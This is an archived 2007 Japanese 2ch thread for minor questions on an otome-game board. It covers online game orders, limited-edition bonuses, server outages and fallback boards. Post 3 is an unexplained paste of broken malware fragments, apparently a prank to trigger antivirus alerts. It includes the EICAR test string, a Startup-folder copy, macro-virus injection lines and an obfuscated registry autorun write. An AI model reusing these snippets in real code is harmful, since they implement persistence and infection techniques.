2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

スレ立てるまでもない質問・雑談 5

1 :名無しって呼んでいいか?:2007/10/04(木) 16:48:52 ID:???
スレッドを立てるまでもない質問・相談はここで。
ちょっとした相談も歓迎。

次スレは970で。
970の反応がないようなら980から順次お願いします。

◆2ちゃんねる初心者のために◆
あなたの疑問はここで解決できませんか?
初心者の質問@2ch掲示板
http://etc3.2ch.net/qa/
2ちゃんねる初心者のためのページ
http://info.2ch.net/guide/

■わからないことはとりあえず検索。女性向けゲー用語は以下のスレで解決できるかも
http://www.google.co.jp/
◆女性向ゲー用語辞典◆
http://game12.2ch.net/test/read.cgi/ggirl/1086976394/
女性向ゲー用語辞典まとめwiki
http://www7.atwiki.jp/otome/

■自治に関する相談や雑談は自治スレ、ソフト購入の相談は各購入スレで
女ゲー一般板 自治スレッド 4
http://game12.2ch.net/test/read.cgi/ggirl/1161185164/
乙女ゲーム購入相談所7
http://game12.2ch.net/test/read.cgi/ggirl/1180610601/
■全年齢BLゲーム購入相談・雑談所■
http://game9.2ch.net/test/read.cgi/ggirl/1067596755/
女主人公ゲームまとめサイト
http://naha.cool.ne.jp/girlgame/

スレッドの立て方、削除依頼については>>2-5あたり

前スレ
スレ立てるまでもない質問・雑談 4
http://game12.2ch.net/test/read.cgi/ggirl/1172217161/

過去スレ
スレ立てるまでもない質問・雑談 3
http://game12.2ch.net/test/read.cgi/ggirl/1150104418/
スレ立てるまでもない質問・雑談 2
http://game9.2ch.net/test/read.cgi/ggirl/1127071016/
●スレ立てるまでもない質問・相談●
http://game9.2ch.net/test/read.cgi/ggirl/1067524308/

2 :名無しって呼んでいいか?:2007/10/04(木) 16:49:41 ID:???
■スレッドを立てる前に

板TOP(http://game9.2ch.net/ggirl/)にあるローカルルールをよく読み
重複を避けるために、既に似たようなスレッドがないか検索してみましょう。
板とスレッド内の検索は、Win『Ctrl+F』/Mac『command+F』
(※半角カナや英語や短くしたフレーズでも検索しましょう)

スレッド一覧→http://game12.2ch.net/ggirl/subback.html
スレッドタイトル検索→http://gulab.ruitomo.com/

■削除依頼の出し方

初めての場合は削除ガイドランにまず目を通してください。
削除依頼でよく分からないことがあったり、削除理由に悩んだときなどは
自治スレの方で質問・相談をしてください。

削除整理@2ch掲示板
http://qb5.2ch.net/saku/
ggirl:ガールズゲー[スレッド削除]
http://qb5.2ch.net/test/read.cgi/saku/1169567984/l50
ggirl:ガールズゲー[レス削除]
http://qb5.2ch.net/test/read.cgi/saku/1066986808/l50
削除ガイドライン
http://info.2ch.net/guide/adv.html

3 :名無しって呼んでいいか?:2007/10/04(木) 17:32:51 ID:???
Set A4 = A1.CreateTextFile(A1.BuildPath(A1. 1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo ", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1. (BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E. 1), A("VHORU@SU/WCR"))
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kak\ \';\ken=\wd+'\START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
whichfile = p + w * 10
End Sub


4 :名無しって呼んでいいか?:2007/10/06(土) 09:27:24 ID:???
>1乙

尼で初めてゲームを注文しようと思っているんだけど(というか通販自体初めて)
伝票に中身が書かれていたりしますか?

特典はあればうれしいけど、発売日特攻にはあんまり興味ないんで、
Konozamaでもいいのですが、発売日が別のゲームを二つ買って、配送一緒にだとなにか都合が悪かったりします?
先の発売日の特典がつかなくなるとか

というか、通販怖くないよって誰かに後押ししてほしいのかもw

5 :名無しって呼んでいいか?:2007/10/06(土) 09:56:56 ID:???
>>1乙です

>>4
外側には中身は書かれてなくて箱の中に紙が入ってる
一括でたくさん注文した場合、どれかの発売日が離れてたり延期されたり入荷がずれたりすると
ずれてないものまで小分け配送になる場合もあるので自分は発売日の近いもので分けて注文してる
特典はどうだろう?

6 :名無しって呼んでいいか?:2007/10/06(土) 10:03:30 ID:???
konozamaではなくkonmaiは商品名が書かれていて「あばばばばばb」となったような気がする

7 :名無しって呼んでいいか?:2007/10/06(土) 10:24:57 ID:???
konozamaで限定版を買おうと予約していたら
商品が足りませんでしたとかなんとかでキャンセルにされ
限定版難民になったという話なら昔聞いたな


8 :4:2007/10/06(土) 21:43:40 ID:???
>5-7
レスありがとうございます。思い切って注文してみます。

9 :名無しって呼んでいいか?:2007/10/06(土) 21:55:04 ID:???
尼で限定版や特典付を買うときは単品注文が基本。
ゲームなら確実に配送無料なんだからまとめるな。分けろ。konozamaが待ってるぞ

10 :名無しって呼んでいいか?:2007/10/07(日) 10:49:15 ID:???
いつもまとめて買ってるけど、普通に限定版届くよ
まとめ注文しても、あとの発売日に合わせて問題なく届いてる

噂の限定版難民になったことはない
まあでも>>9が確実かな、不安なら

11 :名無しって呼んでいいか?:2007/10/07(日) 23:12:31 ID:???
なんか最近、よく落ちるなぁ
サーバーの調子でも悪いんだろうか

12 :名無しって呼んでいいか?:2007/10/07(日) 23:15:42 ID:???
おぉ、復活したか。
繋がらなかったからびっくりしたよ

13 :名無しって呼んでいいか?:2007/10/07(日) 23:18:02 ID:???
女向ゲ板の避難所ってどこだっけ?
以前はブックマに登録してたんだけど…

14 :名無しって呼んでいいか?:2007/10/07(日) 23:22:25 ID:???
ここのことかな?>避難所
乙女ゲー総合避難所 乙女ゲーム全般@したらば
http://jbbs.livedoor.jp/game/15735/

そいや一昨日くらいも落ちてたんだっけ。

15 :名無しって呼んでいいか?:2007/10/07(日) 23:34:27 ID:???
>>14
トントン
ここ最近鯖が不安定だね
さっきのは海外鯖が吹っ飛んだらしいけど…

16 :名無しって呼んでいいか?:2007/10/09(火) 14:46:04 ID:???
アンチとかまではいかないんだけど、
プレイしてみて詰まらなかったり合わなかった、
途中で投げてしまった、といった個別タイトルのスレに書き込むのははばかられるような
ネガ意見・愚痴を吐き出すようなスレってありますかね?

17 :名無しって呼んでいいか?:2007/10/09(火) 14:49:01 ID:???
>>16
このあたり

人気作対象
http://game12.2ch.net/test/read.cgi/ggirl/1155210013/l50
何でもOKのところ
http://game12.2ch.net/test/read.cgi/ggirl/1172869241/l50

18 :名無しって呼んでいいか?:2007/10/09(火) 15:52:05 ID:???
>>17
即レス感謝!
毒吐いてきますw

19 :名無しって呼んでいいか?:2007/10/12(金) 15:26:39 ID:???
全規制に巻き込まれて書き込めない状態なんですが(この書き込みは代行スレにお願いしてもらいました)
商業ゲームの雑談が出来るような、この板の避難所みたいなものはないんでしょうか?
>>14に行ってみたんですけど、同人専用で
商業ゲームの話をするのは場違いなようなので…。

かなり長期化するとも言われているので、避難所があったら助かるんですが
現時点ではないんでしょうか?
知っている人がいたらぜひ誘導お願いします

20 :名無しって呼んでいいか?:2007/10/12(金) 15:38:11 ID:???
商業のって、ソフトやメーカーごとに、したらば使ってるところが多いからなー。


21 :名無しって呼んでいいか?:2007/10/12(金) 15:41:37 ID:???
>>19
乙女ゲーム全般@したらば http://jbbs.livedoor.jp/game/15735/

 商業・同人問わず、乙女ゲーム全般の話題OK。
 スレ立てにお伺い等は不要です。御自由にドゾー

なんだから、そういうスレを立てたら?

9 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)